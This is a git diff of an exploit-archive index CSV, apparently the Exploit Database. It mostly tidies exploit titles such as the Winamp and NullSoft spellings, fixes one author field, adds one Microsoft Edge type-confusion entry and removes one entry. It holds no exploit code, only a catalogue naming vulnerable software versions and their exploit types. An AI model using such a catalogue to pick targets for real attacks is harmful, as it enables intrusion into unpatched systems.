diff --git a/files.csv b/files.csv index 82c801a8e..4179a1f3e 100755 --- a/files.csv +++ b/files.csv @@ -349,7 +349,7 @@ id,file,description,date,author,platform,type,port 1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0 1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos,0 1927,platforms/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos,0 -1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0 +1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0 1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0 1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0 @@ -408,7 +408,7 @@ id,file,description,date,author,platform,type,port 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0 2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 -2708,platforms/windows/dos/2708.c,"Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0 +2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0 2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0 2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0 @@ -656,7 +656,7 @@ id,file,description,date,author,platform,type,port 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos,0 4613,platforms/windows/dos/4613.html,"Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC)",2007-11-08,Elazar,windows,dos,0 4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 -4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 +4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0 4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0 @@ -717,7 +717,7 @@ id,file,description,date,author,platform,type,port 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0 -5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0 +5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0 5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,windows,dos,0 5396,platforms/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0 @@ -899,7 +899,7 @@ id,file,description,date,author,platform,type,port 7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0 -7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0 +7696,platforms/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)",2009-01-09,Houssamix,windows,dos,0 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",windows,dos,0 7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,windows,dos,0 @@ -1357,7 +1357,7 @@ id,file,description,date,author,platform,type,port 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0 11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0 11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0 -11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0 +11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,windows,dos,0 11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,cr4wl3r,windows,dos,0 @@ -3305,7 +3305,7 @@ id,file,description,date,author,platform,type,port 25046,platforms/linux/dos/25046.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (1)",2004-12-22,"Marcin Zgorecki",linux,dos,0 25047,platforms/linux/dos/25047.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (2)",2004-12-22,Antimatt3r,linux,dos,0 25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 - Infinite Array Sort Denial of Service",2005-01-21,"Berend-Jan Wever",multiple,dos,0 -25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0 +25061,platforms/windows/dos/25061.txt,"NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0 25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service",2005-01-27,MC.Iglo,windows,dos,0 25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",linux,dos,0 25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service",2005-02-01,"Ziv Kamir",multiple,dos,0 @@ -3433,8 +3433,8 @@ id,file,description,date,author,platform,type,port 26526,platforms/windows/dos/26526.py,"VideoLAN VLC Media Player 2.0.7 - '.png' Crash (PoC)",2013-07-01,"Kevin Fujimoto",windows,dos,0 26548,platforms/hardware/dos/26548.pl,"Cisco PIX - TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",hardware,dos,0 26555,platforms/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,windows,dos,0 -26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0 -26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0 +26557,platforms/windows/dos/26557.txt,"Winamp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0 +26558,platforms/windows/dos/26558.txt,"Winamp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0 26575,platforms/windows/dos/26575.txt,"MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service",2005-11-23,"Josh Zlatin-Amishav",windows,dos,0 26578,platforms/windows/dos/26578.py,"Realtek Sound Manager AvRack - '.wav' Crash (PoC)",2013-07-03,Asesino04,windows,dos,0 26601,platforms/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",linux,dos,0 @@ -4439,7 +4439,7 @@ id,file,description,date,author,platform,type,port 35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0 -35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0 +35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0 35842,platforms/windows/dos/35842.c,"Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service",2015-01-20,"Parvez Anwar",windows,dos,0 35849,platforms/osx/dos/35849.c,"Apple Mac OSX 10.10 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 - Denial of Service",2011-06-14,echo,multiple,dos,0 @@ -5264,6 +5264,7 @@ id,file,description,date,author,platform,type,port 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0 40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0 +40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5787,7 +5788,7 @@ id,file,description,date,author,platform,type,port 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0 -4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 +4703,platforms/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 4749,platforms/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Stack Overflow",2007-12-18,devcode,windows,local,0 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow",2007-12-18,"SYS 49152",windows,local,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local,0 @@ -5814,10 +5815,9 @@ id,file,description,date,author,platform,type,port 5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,windows,local,0 5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - (FontName) Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0 -5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - (pkgadd) Privilege Escalation",2008-04-04,qaaz,sco,local,0 -5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA - Privilege Escalation",2008-04-04,qaaz,sco,local,0 -5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - mcd Privilege Escalation",2008-04-04,qaaz,sco,local,0 -5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow",2008-04-04,shinnai,windows,local,0 +5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalation",2008-04-04,qaaz,sco,local,0 +5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA 1.1.4 - Privilege Escalation",2008-04-04,qaaz,sco,local,0 +5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - 'mcd' Privilege Escalation",2008-04-04,qaaz,sco,local,0 5424,platforms/linux/local/5424.txt,"AlsaPlayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow",2008-04-10,"Albert Sellares",linux,local,0 5442,platforms/windows/local/5442.cpp,"Microsoft Windows - GDI Image Parsing Stack Overflow (MS08-021)",2008-04-14,Lamhtz,windows,local,0 5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)",2008-04-18,muts,windows,local,0 @@ -6264,7 +6264,7 @@ id,file,description,date,author,platform,type,port 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0 -11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0 +11139,platforms/windows/local/11139.c,"Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow",2010-01-16,Dz_attacker,windows,local,0 @@ -6279,8 +6279,8 @@ id,file,description,date,author,platform,type,port 11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0 11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0 11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 -11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow",2010-01-25,Dz_attacker,windows,local,0 -11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0 +11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0 +11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0 11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0 11267,platforms/windows/local/11267.py,"Winamp 5.572 - SEH Exploit",2010-01-26,TecR0c,windows,local,0 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0 @@ -6343,7 +6343,7 @@ id,file,description,date,author,platform,type,port 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0 -12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0 +12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)",2010-04-16,blake,windows,local,0 12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 @@ -6388,7 +6388,7 @@ id,file,description,date,author,platform,type,port 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0 -14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0 +14068,platforms/windows/local/14068.py,"Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0 14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow (Metasploit)",2010-06-27,blake,windows,local,0 14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 - Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0 @@ -6484,7 +6484,7 @@ id,file,description,date,author,platform,type,port 14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 -14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 +14789,platforms/windows/local/14789.c,"NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0 14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local,0 14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local,0 @@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 -27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0 +27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0 27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local,0 27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 @@ -7986,7 +7986,7 @@ id,file,description,date,author,platform,type,port 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0 -40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,legalhackers,linux,local,0 +40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 @@ -11199,8 +11199,8 @@ id,file,description,date,author,platform,type,port 19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0 19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0 -19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 -19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 +19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 +19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0 40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0 19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0 @@ -11856,7 +11856,7 @@ id,file,description,date,author,platform,type,port 20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (3)",2005-02-02,styx,windows,remote,0 20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (4)",2001-05-01,"Cyrus The Great",windows,remote,0 20819,platforms/windows/remote/20819.txt,"BRS Webweaver 0.x - FTP Root Full Path Disclosure",2001-04-28,joetesta,windows,remote,0 -20820,platforms/windows/remote/20820.c,"Nullsoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0 +20820,platforms/windows/remote/20820.c,"NullSoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0 20825,platforms/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0 20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 - Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 @@ -12968,7 +12968,7 @@ id,file,description,date,author,platform,type,port 24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0 24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",multiple,remote,0 24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 -24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 +24571,platforms/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 - Notification Instance Name Remote Buffer Overflow",2004-09-03,anonymous,windows,remote,0 24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6 - IFRAME Status Bar URI Obfuscation",2004-11-02,"Benjamin Tobias Franz",windows,remote,0 